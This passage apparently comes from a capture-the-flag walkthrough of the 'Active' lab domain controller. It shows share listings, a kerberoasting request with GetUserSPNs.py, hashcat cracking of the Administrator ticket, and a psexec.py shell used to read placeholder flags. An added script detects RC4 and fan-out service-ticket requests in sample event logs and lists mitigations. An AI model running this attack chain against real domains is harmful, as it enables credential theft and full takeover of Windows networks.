dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Local
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Roaming
.\Users\Default\AppData\Local\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Application Data
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 History
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Microsoft
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Temp
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Temporary Internet Files
.\Users\Default\AppData\Local\Microsoft\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Windows
.\Users\Default\AppData\Local\Microsoft\Windows\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 GameExplorer
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 History
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Temporary Internet Files
.\Users\Default\AppData\Roaming\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Microsoft
.\Users\Default\AppData\Roaming\Microsoft\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Internet Explorer
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Windows
.\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Quick Launch
.\Users\Default\AppData\Roaming\Microsoft\Windows\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Cookies
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Network Shortcuts
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Printer Shortcuts
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Recent
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 SendTo
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Start Menu
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Templates
.\Users\Default\Documents\*
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 .
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Music
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Pictures
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Videos
.\Users\SVC_TGS\*
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 .
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 ..
dr--r--r-- 0 Sat Jul 21 11:14:20 2018 Contacts
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 Desktop
dr--r--r-- 0 Sat Jul 21 11:14:28 2018 Downloads
dr--r--r-- 0 Sat Jul 21 11:14:50 2018 Favorites
dr--r--r-- 0 Sat Jul 21 11:15:00 2018 Links
dr--r--r-- 0 Sat Jul 21 11:15:23 2018 My Documents
dr--r--r-- 0 Sat Jul 21 11:15:40 2018 My Music
dr--r--r-- 0 Sat Jul 21 11:15:50 2018 My Pictures
dr--r--r-- 0 Sat Jul 21 11:16:05 2018 My Videos
dr--r--r-- 0 Sat Jul 21 11:16:20 2018 Saved Games
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 Searches
.\Users\SVC_TGS\Desktop\*
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 .
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 ..
fw--w--w-- 34 Mon Sep 26 18:23:56 2022 user.txt
With this account, GetUserSPNs.py can request a service ticket for every user account that has an SPN set; the ticket is returned in hashcat's krb5tgs format for offline cracking. It's time to kerberoast.
$ GetUserSPNs.py active.htb/svc_tgs:GPP_PASSWORD -dc-ip 10.10.10.100 -request
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40 2022-09-08 14:13:55
Copy the krb5tgs hash that GetUserSPNs.py prints after the table and run hashcat on a Windows machine with a decent GPU, if one is available:
hashcat.exe -m 13100 krb5tgs_hash.txt rockyou.txt -O
The cracked Administrator password is printed in the results (KRB5TGS_PASSWORD here).
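On the detection side, the request above lands on the domain controller as a Security event 4769 for service Administrator with TicketEncryptionType 0x17 (RC4, the etype that hashcat mode 13100 cracks). The script below is an added example, not from the original write-up; it runs two checks over constructed 4769 records in a simplified JSON-lines form: RC4 tickets for user-account SPNs, and one requester fanning out to several user-account SPNs in a short window. Field names follow the real event; the client address and the sqlsvc account are made up.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23: the ticket type hashcat mode 13100 cracks

# Constructed 4769 events in a simplified JSON-lines export; field names follow the
# real event. svc_tgs first gets a normal AES ticket for the DC's own account (share
# access), then RC4 tickets for two user-account SPNs, one of them Administrator's.
# The client address 10.10.14.5 and the sqlsvc account are made up.
SAMPLE_4769_LOG = """\
{"time":"2022-09-08T14:13:50Z","TargetUserName":"svc_tgs@ACTIVE.HTB","ServiceName":"DC$","TicketEncryptionType":"0x12","IpAddress":"::ffff:10.10.14.5","Status":"0x0"}
{"time":"2022-09-08T14:13:51Z","TargetUserName":"DC$@ACTIVE.HTB","ServiceName":"DC$","TicketEncryptionType":"0x12","IpAddress":"::ffff:10.10.10.100","Status":"0x0"}
{"time":"2022-09-08T14:13:55Z","TargetUserName":"svc_tgs@ACTIVE.HTB","ServiceName":"Administrator","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.10.14.5","Status":"0x0"}
{"time":"2022-09-08T14:13:56Z","TargetUserName":"svc_tgs@ACTIVE.HTB","ServiceName":"sqlsvc","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.10.14.5","Status":"0x0"}
{"time":"2022-09-08T14:20:00Z","TargetUserName":"jdoe@ACTIVE.HTB","ServiceName":"DC$","TicketEncryptionType":"0x12","IpAddress":"::ffff:10.10.10.50","Status":"0x0"}
"""


def parse_4769(log_text: str) -> list[dict]:
    """One dict per event, with a parsed timestamp and an integer etype."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["time"] = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%SZ")
        ev["etype"] = int(ev["TicketEncryptionType"], 16)
        events.append(ev)
    return events


def is_user_service(name: str) -> bool:
    """User-account SPNs are the roastable ones; computer accounts end in $."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def rc4_user_spn_requests(events: list[dict]) -> list[dict]:
    """Rule 1: successful RC4 (0x17) service tickets for user-account SPNs.
    Baseline first: a legacy service that only supports RC4 will trip this."""
    return [e for e in events
            if e["Status"] == "0x0" and e["etype"] == RC4_HMAC
            and is_user_service(e["ServiceName"])]


def spn_fanout(events: list[dict], threshold: int = 2,
               window: timedelta = timedelta(minutes=5)) -> dict[tuple, set]:
    """Rule 2: one requester (user, source IP) obtaining tickets for >= threshold
    distinct user-account SPNs inside `window`, whatever the etype. This also
    catches AES-only roasting, which rule 1 misses."""
    by_requester = defaultdict(list)
    for e in events:
        if e["Status"] == "0x0" and is_user_service(e["ServiceName"]):
            by_requester[(e["TargetUserName"], e["IpAddress"])].append(e)
    hits = {}
    for key, evs in by_requester.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            names = {x["ServiceName"] for x in evs[i:]
                     if x["time"] - first["time"] <= window}
            if len(names) >= threshold:
                hits[key] = names
                break
    return hits


if __name__ == "__main__":
    evs = parse_4769(SAMPLE_4769_LOG)
    for e in rc4_user_spn_requests(evs):
        print(f"[rc4] {e['TargetUserName']} got a ticket for {e['ServiceName']} from {e['IpAddress']}")
    for (user, ip), names in spn_fanout(evs).items():
        print(f"[fanout] {user} from {ip} requested {sorted(names)}")
    # Mitigation: long random passwords or gMSAs for SPN-bearing accounts, AES-only
    # via msDS-SupportedEncryptionTypes, and no SPN on privileged users like Administrator.
```
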
Back in Kali, use psexec.py with the cracked password to get a shell.
$ psexec.py active.htb/Administrator:KRB5TGS_PASSWORD@10.10.10.100
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file CySmgJkQ.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service JqmJ on 10.10.10.100.....
[*] Starting service JqmJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd \Users
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of C:\Users
21/07/2018 05:39 úú <DIR> .
21/07/2018 05:39 úú <DIR> ..
16/07/2018 01:14 úú <DIR> Administrator
14/07/2009 07:57 ºú <DIR> Public
21/07/2018 06:16 úú <DIR> SVC_TGS
0 File(s) 0 bytes
5 Dir(s) 1.144.369.152 bytes free
C:\Users>dir SVC_TGS
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of C:\Users\SVC_TGS
21/07/2018 06:16 úú <DIR> .
21/07/2018 06:16 úú <DIR> ..
21/07/2018 06:14 úú <DIR> Contacts
21/07/2018 06:14 úú <DIR> Desktop
21/07/2018 06:14 úú <DIR> Downloads
21/07/2018 06:14 úú <DIR> Favorites
21/07/2018 06:14 úú <DIR> Links
21/07/2018 06:15 úú <DIR> My Documents
21/07/2018 06:15 úú <DIR> My Music
21/07/2018 06:15 úú <DIR> My Pictures
21/07/2018 06:15 úú <DIR> My Videos
21/07/2018 06:16 úú <DIR> Saved Games
21/07/2018 06:16 úú <DIR> Searches
0 File(s) 0 bytes
13 Dir(s) 1.144.369.152 bytes free
C:\Users>dir SVC_TGS\Desktop
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of C:\Users\SVC_TGS\Desktop
21/07/2018 06:14 úú <DIR> .
21/07/2018 06:14 úú <DIR> ..
08/09/2022 09:13 úú 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 1.144.369.152 bytes free
C:\Users>type SVC_TGS\Desktop\user.txt
ABCDEFGHIJKLMNOPQRSTUVWXYZ12345678
C:\Users>dir Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C
Directory of C:\Users\Administrator\Desktop
21/01/2021 07:49 úú <DIR> .
21/01/2021 07:49 úú <DIR> ..
08/09/2022 09:13 úú 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 1.144.369.152 bytes free
C:\Users>type Administrator\Desktop\root.txt
ABCDEFGHIJKLMNOPQRSTUVWXYZ12345678
C:\Users>
It might be worth the time to see what other vulnerabilities this machine has.
More info:
book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast
github.com/nidem/kerberoast
gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a